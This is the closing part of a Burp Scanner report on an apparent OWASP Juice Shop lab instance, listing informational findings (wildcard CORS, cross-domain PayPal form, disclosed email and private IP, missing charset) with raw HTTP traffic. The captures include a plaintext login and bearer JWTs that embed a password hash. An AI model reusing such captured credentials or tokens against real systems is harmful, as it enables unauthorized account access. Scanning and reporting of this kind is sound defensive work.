    Host:   http://192.168.61.143:3000
    Path:   /public/images/products/dist/juice-shop.min.js

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /public/images/products/dist/juice-shop.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 00:59:55 GMT
    ETag: W/"2639-15942f0cef8"
    Content-Type: text/html; charset=UTF-8
    Content-Length: 9785
    Date: Sun, 15 Jan 2017 21:20:09 GMT
    Connection: close

    <!DOCTYPE html>
    <!--[if lt IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
    <!--[if IE 7]>
    <html lang="en" ng-app="juiceShop" class="no-js lt-ie9 lt-ie8"> <![
    ...[SNIP]...
    15.98. http://192.168.61.143:3000/redirect
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /redirect

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /redirect HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 500 Internal Server Error
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: text/html; charset=utf-8
    Date: Sun, 15 Jan 2017 21:20:14 GMT
    Connection: close
    Content-Length: 1923

    <html>
    <head>
    <meta charset='utf-8'>
    <title>TypeError: Cannot read property &#39;indexOf&#39; of undefined</title>
    <style>* {
    margin: 0;
    padding: 0;
    outline: 0;
    }

    body {
    paddin
    ...[SNIP]...
    15.99. http://192.168.61.143:3000/rest/admin/application-version
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /rest/admin/application-version

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /rest/admin/application-version HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    If-None-Match: W/"14-7sFzBTJmHd4ipuzu+uHz+Q"
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 304 Not Modified
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    ETag: W/"14-7sFzBTJmHd4ipuzu+uHz+Q"
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    15.100. http://192.168.61.143:3000/rest/basket/4
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /rest/basket/4

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /rest/basket/4 HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Cookie: io=_u0wPeQi82ftthU7AAAB; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Content-Length: 153
    ETag: W/"99-/EyBecKDYmesnlS6nA35eA"
    Date: Sun, 15 Jan 2017 21:01:15 GMT
    Connection: close

    {"status":"success","data":{"id":4,"coupon":null,"createdAt":"2017-01-15T21:01:01.000Z","updatedAt":"2017-01-15T21:01:01.000Z","UserId":7,"products":[]}}
    15.101. http://192.168.61.143:3000/rest/basket/4/checkout
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /rest/basket/4/checkout

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    POST /rest/basket/4/checkout HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Cookie: io=_u0wPeQi82ftthU7AAAB; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close
    Content-Length: 0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: text/html; charset=utf-8
    Content-Length: 47
    ETag: W/"2f-E73nQCeKzZ40wOI8tNHL7g"
    Date: Sun, 15 Jan 2017 21:01:56 GMT
    Connection: close

    /ftp/order_30d296d845a9e4ca118e2f91484e0107.pdf
    15.102. http://192.168.61.143:3000/rest/product/search
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /rest/product/search

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /rest/product/search?q=undefined HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Cookie: io=_u0wPeQi82ftthU7AAAB; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close
    If-None-Match: W/"13d5-B1vmMiFMKgf/am+oDgqthA"

    Response 1

    HTTP/1.1 304 Not Modified
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    ETag: W/"13d5-B1vmMiFMKgf/am+oDgqthA"
    Date: Sun, 15 Jan 2017 21:01:01 GMT
    Connection: close

    15.103. http://192.168.61.143:3000/rest/user/login
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /rest/user/login

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    POST /rest/user/login HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json;charset=utf-8
    Referer: http://192.168.61.143:3000/
    Content-Length: 69
    Cookie: io=_u0wPeQi82ftthU7AAAB
    DNT: 1
    Connection: close

    {"email":"mike_landeck@hotmail.com","password":"juice-shop-password"}

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Content-Length: 458
    ETag: W/"1ca-oQ64vYpHG9RIEsQ0IggpAg"
    Date: Sun, 15 Jan 2017 21:01:01 GMT
    Connection: close

    {"token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2I
    ...[SNIP]...
    15.104. http://192.168.61.143:3000/rest/user/whoami
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /rest/user/whoami

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /rest/user/whoami HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Content-Length: 43
    ETag: W/"2b-FMn/4uFOBvpEHr18dhkCVQ"
    Date: Sun, 15 Jan 2017 21:02:57 GMT
    Connection: close

    {"id":7,"email":"mike_landeck@hotmail.com"}
    15.105. http://192.168.61.143:3000/socket.io/
    Previous

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /socket.io/

    Issue detail

    The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request.

    If the application relies on network firewalls or other IP-based access controls, this policy is likely to present a security risk.

    Since the Vary: Origin header was not present in the response, reverse proxies and intermediate servers may cache it. This may enable an attacker to carry out cache poisoning attacks.

    Request 1

    GET /socket.io/ HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 400 Bad Request
    Content-Type: application/json
    Access-Control-Allow-Origin: *
    Date: Sun, 15 Jan 2017 21:22:24 GMT
    Connection: close
    Content-Length: 40

    {"code":0,"message":"Transport unknown"}
    16. Cross-domain POST
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /dist/juice-shop.min.js

    Issue detail

    The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

    Issue background

    Applications sometimes use POST requests to transfer sensitive information from one domain to another. This does not necessarily constitute a security vulnerability, but it creates a trust relationship between the two domains. Data transmitted between domains should be reviewed to determine whether the originating application should be trusting the receiving domain with this information.

    Request 1

    GET /dist/juice-shop.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 01:05:12 GMT
    ETag: W/"10e10-15942f5a540"
    Content-Type: application/javascript
    Content-Length: 69136
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    angular.module("juiceShop",["ngRoute","ngCookies","ngTouch","ngAnimate","ngFileUpload","ui.bootstrap","pascalprecht.translate","btford.socket-io","ngclipboard","base64","monospaced.qrcode"]),angular.m
    ...[SNIP]...
    <div class="row">\n <form action="https://www.paypal.com/cgi-bin/webscr" method="post" target="_blank" style="display: inline-block;">\n <div class="paypal_donation_button">
    ...[SNIP]...
    17. Email addresses disclosed
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /dist/juice-shop.min.js

    Issue detail

    The following email address was disclosed in the response:

    Issue background

    The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

    However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organization's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

    Request 1

    GET /dist/juice-shop.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 01:05:12 GMT
    ETag: W/"10e10-15942f5a540"
    Content-Type: application/javascript
    Content-Length: 69136
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    angular.module("juiceShop",["ngRoute","ngCookies","ngTouch","ngAnimate","ngFileUpload","ui.bootstrap","pascalprecht.translate","btford.socket-io","ngclipboard","base64","monospaced.qrcode"]),angular.m
    ...[SNIP]...
    <input type="hidden" name="business" value="paypal@owasp.org">
    ...[SNIP]...
    18. Private IP addresses disclosed
    Previous  Next

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /dist/juice-shop.min.js

    Issue detail

    The following RFC 1918 IP address was disclosed in the response:

    Issue background

    RFC 1918 specifies ranges of IP addresses that are reserved for use in private networks and cannot be routed on the public Internet. Although various methods exist by which an attacker can determine the public IP addresses in use by an organization, the private addresses used internally cannot usually be determined in the same ways.

    Discovering the private addresses used within an organization can help an attacker in carrying out network-layer attacks aiming to penetrate the organization's internal infrastructure.

    Request 1

    GET /dist/juice-shop.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 01:05:12 GMT
    ETag: W/"10e10-15942f5a540"
    Content-Type: application/javascript
    Content-Length: 69136
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    angular.module("juiceShop",["ngRoute","ngCookies","ngTouch","ngAnimate","ngFileUpload","ui.bootstrap","pascalprecht.translate","btford.socket-io","ngclipboard","base64","monospaced.qrcode"]),angular.m
    ...[SNIP]...
    ce-shop.herokuapp.com","https://juice-shop-staging.herokuapp.com":"https://juice-shop-staging.herokuapp.com","http://localhost:3000":"http://localhost:3000","http://juice.sh":"http://juice.sh","http://192.168.99.100:3000":"http://tinyurl.com/ipMacLocalhost"},j=c.protocol()+"://"+location.host;a.oauthUnavailable=!i[j],a.oauthUnavailable&&console.log(j+" is not an authorized redirect URI for this application.")}]),
    ...[SNIP]...
    ce-shop.herokuapp.com","https://juice-shop-staging.herokuapp.com":"https://juice-shop-staging.herokuapp.com","http://localhost:3000":"http://localhost:3000","http://juice.sh":"http://juice.sh","http://192.168.99.100:3000":"http://tinyurl.com/ipMacLocalhost"},j=c.protocol()+"://"+location.host;a.oauthUnavailable=!i[j],a.oauthUnavailable&&console.log(j+" is not an authorized redirect URI for this application.")}]),
    ...[SNIP]...
    19. HTML does not specify charset
    Previous

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /socket.io/

    Issue description

    If a response states that it contains HTML content but does not specify a character set, then the browser may analyze the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

    In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of affected responses, and the context in which they appear, to determine whether any vulnerability exists.

    Request 1

    GET /socket.io/?EIO=3&transport=websocket&sid=1uGV4rL6GpBTykvMAAAC HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Sec-WebSocket-Version: 13
    Origin: http://192.168.61.143:3000
    Sec-WebSocket-Extensions: permessage-deflate
    Sec-WebSocket-Key: /1vQNITk+6NMWtMs77iTHw==
    Cookie: io=1uGV4rL6GpBTykvMAAAC; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: keep-alive, Upgrade
    Pragma: no-cache
    Cache-Control: no-cache
    Upgrade: websocket

    Response 1

    HTTP/1.1 400 Bad Request
    Connection: close
    Content-type: text/html
    Content-Length: 18

    Session ID unknown

    Report generated by Burp Scanner v1.7.14, at Sun Jan 15 14:04:20 PST 2017.